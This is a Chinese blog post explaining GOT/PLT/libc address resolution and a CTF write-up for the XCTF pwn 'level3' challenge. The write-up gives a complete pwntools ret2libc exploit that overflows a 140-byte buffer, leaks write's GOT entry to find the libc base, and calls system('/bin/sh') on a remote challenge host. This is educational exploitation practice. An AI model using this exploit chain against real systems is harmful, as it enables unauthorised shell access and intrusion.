浅析got,plt,libc

见详解:https://blog.csdn.net/weixin_41185953/article/details/104224260

在引用一个函数时(如call printf)先会条到该函数的plt表:@plt。然后plt表上存有对应该函数的got表地址,跳到got表上。这个表上面存放被引用函数的真实地址。
为了程序运行时的效率,还没有引用某个函数时程序不会连接启用包括此函数这样就使程序运行速度更快。

picture1

libc文件里面包含大量函数包括system,read,write还有字符串/bin/sh ,libc在被程序引用时会分配到一个地址也就是libc的首地址,然后里面的函数或被程序引用。

引用过程:
首先libc分配到一个地址,他里面的函数字符串什么的本来就有内部基于libc首地址的偏移量,这些偏移量都是可以用ELF指令解析libc文件再用搜寻指令查到。所以一旦libc被引用分配得首地址libc里面所包括的所有函数和字符串地址就都确定了。call函数时用上述的plt,got表跳转寻址,最后通过重定位got表得到真实函数地址。

对应题目:xctf pwn level3
1:file

picture2

2:checksec

picture3

可以栈溢出,NX开启:rop绕过

3:ida

picture4

picture5

查看buf的栈空间发现可以溢出:溢出量140

所以现在的思路就是:payload = “A”*140 + p32(system_addr) + p32(0) + p32(binsh_addr)
所以得有哦system函数和binsh字符串 注意此处system函数的构建:函数地址+返回地址+函数参数 很多情况都是在栈中这样构建函数

4:ida查看函数与字符串

picture6

显然这个程序只调用了read和write函数,没有system和binsh。恰好libc里面这两个都有所以要想办法得到libc的基地址。

这里write函数有三个参数:1,字符串(地址),显示的字节数

如果我们溢出了read函数后跳到我们自己构建的write函数上,把中间的参数改为write的got地址那么显示出got表上存放write函数的真实
地址(plt存储got表地址,got表存放函数地址)。
如果我们得到了write函数的真实地址,然后可以轻松得到write函数在libc中的偏移量,最后算出libc的基地址:libc_addr = write_addr - write_offset
得到了libc的基地址那么我们就可以得到system和binsh的真实地址,然后再进行一次溢出攻击即可

exp:

from pwn import*

sh = remote("124.126.19.106",52825)

#sh = process("level3")

elf = ELF("level3")    
libc = ELF("libc_32.so.6")

write_plt = elf.symbols['write']    #write函数的plt地址
write_got = elf.got['write']  #write函数的got地址,该地址存放write真实地址
main_addr = 0x08048484 #main函数地址可以从ida直接看,也可以elf.symbols['main']搜索

#print write_plt     
#print write_got
#print main_addr

payload = "A"*140 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) #第一次攻击溢出后返回到write函数的plt地址,因为write函数早已调用可以用plt地址或got地址来再次调用。后面时返回地址,返回到主函数将再次执行vulnerable函数以备下一次攻击。p32(1)为write函数的第一个参数,接下来分别是第二个第三个参数。p32(write_got)将go地址发给write作为参数,write将读取该地址上的内容并以字符串输出,p32(4)输出4字节

#p.recv()
sh.recv() 

sh.sendline(payload)

write_addr = u32(sh.recv(4))  #sh.recv(4)是接受4个字节的输出,u32和p32功能相反

#print write_addr

libc_addr = write_addr - libc.symbols['write'] #减去了write的offset

#print(hex(libc_addr))

#print "libc"+hex(libc_addr)

binsh_addr = libc_addr + libc.search("/bin/sh").next()  #得到binsh真实地址



#print "binsh_addr => "+hex(binsh_addr)

sys_addr = libc_addr + libc.symbols['system']  #得到system真实地址

print "sys_addr => "+hex(sys_addr)

payload = "A"*140 + p32(sys_addr) + p32(0) + p32(binsh_addr)  #通过上次攻击返回地址位vulnerable函数可以再次攻击

sh.recv()

sh.sendline(payload)

sh.interactive()

注意在本地测试脚本时要找到本地level3引用的libc文件:指令ldd level3

picture7

因为本地的libc文件和题目给的有点不一样,至少offset是不一样的。


  转载请注明: Squarer 浅析got,plt,libc

 上一篇
BLOG BLOG
hexo基本写文章操作:1:在自己本地blog文件夹git bash here 2:在bash中:hexo n “name” 或是直接在_posts中写文章 3:文章中插入图片 语法: ![图片alt](图片
2020-05-23
下一篇 
Format String Exploit Format String Exploit
格式化字符串漏洞原理格式化字符串函数是根据格式化字符串函数来进行解析的。那么相应的要被解析的参数的个数也自然是由这个格式化字符串所控制。比如说’%s’表明我们会输出一个字符串参数。 对于这样的例子,在
2020-05-22
  目录